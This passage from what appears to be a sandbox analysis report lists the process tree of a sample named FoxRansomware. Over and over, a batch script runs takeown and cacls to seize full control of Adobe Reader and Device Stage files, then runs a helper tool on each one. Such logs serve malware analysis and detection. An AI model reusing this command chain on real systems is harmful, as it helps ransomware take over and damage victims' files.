- Modifies file permissions
PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa.fca" -nobanner3⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "usa.fca" -nobanner4⤵PID:4228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:5180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:2468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:4304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:4596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:4608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:3980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:5912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:4760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵
- Modifies file permissions
PID:1704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:4768
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:4656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:4864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner3⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "background.png" -nobanner4⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:4848
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:4820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:5324
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:4240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:6040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:6084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:6012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:3712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:6104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "main.css" -nobanner3⤵PID:2488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "main.css" -nobanner4⤵PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:4332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_shared.gif" -nobanner3⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "review_shared.gif" -nobanner4⤵PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:4400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:5000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:4988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:2704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:3372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:3432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:3476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:3480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:3976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:2608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:3640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:3872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can03.ths" -nobanner3⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can03.ths" -nobanner4⤵PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:5360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:3284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:3296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:5292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:5340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:2564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:5456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:5512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner3⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "superbar.png" -nobanner4⤵PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:5164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "br.gif" -nobanner3⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "br.gif" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:5580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "form_responses.gif" -nobanner3⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "form_responses.gif" -nobanner4⤵PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1876
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_email.gif" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "review_email.gif" -nobanner4⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:2716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
- Modifies file permissions
PID:2072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tr.gif" -nobanner3⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tr.gif" -nobanner4⤵PID:2464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:3024
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:2292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:2208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:2724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:2892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:2040
-
-
